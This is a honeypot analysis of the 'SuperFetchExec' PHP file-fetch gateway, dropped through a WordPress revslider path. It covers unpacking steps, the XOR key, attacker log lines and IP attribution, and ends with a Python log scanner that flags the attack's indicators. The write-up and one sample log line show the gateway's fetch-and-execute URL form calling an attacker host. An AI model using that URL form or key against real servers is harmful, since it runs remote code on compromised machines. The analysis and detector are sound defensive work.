SuperFetchExec is a file transfer gateway. It is accessed by URL, something like:
http://example.com/directory/syslib.php?superfetch+http://something.com/evil.php
SuperFetchExec would try to download evil.php from http://something.com to the compromised machine on which it runs. Then SuperFetchExec would try to execute evil.php.
UPDATE 2018-08-13: my WSO honey pot got a new instance of this code. Same IP address, same everything. Why doesn't somebody shut this crap down?
178.137.88.27 → 178-137-88-27.broadband.kyivstar.net
kyivstar.net appears to be an ISP in Kiev, Ukraine.
178.137.88.27 geolocates to downtown Lviv, Ukraine.
p0f3 says that 178.137.88.27 is "Windows 7 or 8", sort of consistent with the user agent string it used.
Someone intended to download this code via the "FilesMan" action, "uploadFile" sub-action of a WSO web shell they thought was installed in my WordPress honey pot. I have a fake WSO web shell, so I just caught the file.
The file was intended to be named syslib.php. Steps to unpack it:
1. ~/src/php/reverse-php-malware/pp.php 178.137.88.27WimZ3KYUg72jOWoTIndRKAAAAAM.0.file > f1.php, pretty-print the original.
2. Hand-edit f1.php, change "eval" to "print", so that I can execute it: php f1.php > dc1.php, then add "<?php" to dc1.php.
3. ~/src/php/reverse-php-malware/pp.php dc1.php > f2.php, pretty-print the first level de-obfuscated code.
4. Hand-edit f2.php into dc2.php, so that I can safely execute it: php dc2.php > puzzling.dat
File puzzling.dat is the same xor-encoded PHP source as used in xor-decoding as an example of how to decode just such a file. See that repo for an explanation of how to get the key to decode puzzling.dat.
The key string is "SjJVkE6rkRYj", which is the value of $k that code in f2.php tries to get out of POST or GET parameters.
I've reverse-engineered the first-stage encoding that steps 2 and 3 above just gloss over.
Apparently this is the "SuperFetchExec" malware; an early reference has it around since 2012, using the same key. How does this same stupid thing get used for 5+ years?
To get to the SuperFetchExec code:
php decoder.php > superfetchexec.php
Looks like someone tried to execute syslib.php:
/var/log/httpd/access_log.3:176.119.3.201 - - [07/Dec/2017:13:33:31 -0700] "GET /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/syslib.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Goooglebot/2.1; +http://www.google.com/bot.html)"
/var/log/httpd/access_log.3:176.119.3.201 - - [07/Dec/2017:13:33:43 -0700] "GET /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/syslib.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Goooglebot/2.1; +http://www.google.com/bot.html)"
That access happened almost 50 minutes after the installation attempt. Looks like both attempts tried to get the Linux hostname command to execute locally.
See files 176.119.3.201Wimlp1Qt96SxMyTU5Bip4QAAAAE.wso.scans and 176.119.3.201Wimlm6YUg72jOWoTIndRSQAAAAM.wso.scans for exact details. My fake WSO left those files behind as a record.
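Added here as a detection example (not the page's code or the author's tooling): a Python scan over Apache combined-format log lines that flags the indicators this page records, namely the syslib.php drop name and revslider temp path from the log lines above, the superfetch+URL query form from the first paragraph, and the misspelled "Goooglebot" user agent. The two real log lines are embedded as input alongside a constructed superfetch request (TEST-NET address, attacker.example placeholder host) and a benign request; the tag names are my own.

```python
"""Flag Apache access-log lines showing the SuperFetchExec activity quoted above:
syslib.php drop name, revslider temp path, 'superfetch+<url>' query, 'Goooglebot' UA."""
import re
# Apache combined format; tolerates the "file:" prefix that grep prepends.
LOG_RE = re.compile(
    r'^(?:[^:\s]+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def classify(rec):
    """Return the indicator tags that match one parsed record (empty if benign)."""
    reasons = []
    path, _, query = rec["path"].partition("?")
    if path.rsplit("/", 1)[-1] == "syslib.php":
        reasons.append("syslib.php")        # drop name used against the honeypot
    if "revslider/temp/update_extract" in path:
        reasons.append("revslider-temp")    # upload dir seen in the log lines above
    if "superfetch+" in query:
        reasons.append("superfetch-cmd")    # gateway's fetch URL form (first paragraph)
    if "Goooglebot" in rec["ua"]:
        reasons.append("fake-googlebot")    # misspelled Googlebot UA from the log
    return reasons

def scan(lines):
    """Return one hit dict (ip, ts, path, reasons) per line that fires any tag."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        reasons = classify(rec) if rec else []
        if reasons:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "reasons": reasons})
    return hits

# Sample input: the two real lines quoted above, one constructed line in the
# SuperFetchExec URL form (TEST-NET address, placeholder host), one benign line.
SAMPLE_LOG = [
    '/var/log/httpd/access_log.3:176.119.3.201 - - [07/Dec/2017:13:33:31 -0700] "GET /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/syslib.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Goooglebot/2.1; +http://www.google.com/bot.html)"',
    '/var/log/httpd/access_log.3:176.119.3.201 - - [07/Dec/2017:13:33:43 -0700] "GET /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/syslib.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Goooglebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.5 - - [13/Aug/2018:10:00:00 -0700] "GET /directory/syslib.php?superfetch+http://attacker.example/evil.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Aug/2018:10:01:00 -0700] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/60.0"',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Feed it real logs with `scan(open("/var/log/httpd/access_log"))`; any hit carrying "superfetch-cmd" means the gateway was asked to fetch a remote file, so check what landed on disk.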
Oddly, DNS has 176.119.3.201 → mail.countrypost.top, which is registered to a Philadelphia USA address. whois has 176.119.3.201 in VSERVER-NET, in AS58271 - VSERVER-AS, a Donetsk Ukraine ISP.
p0f3 doesn't have a guess about the OS used by 176.119.3.201, saying:
raw_sig=4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df:0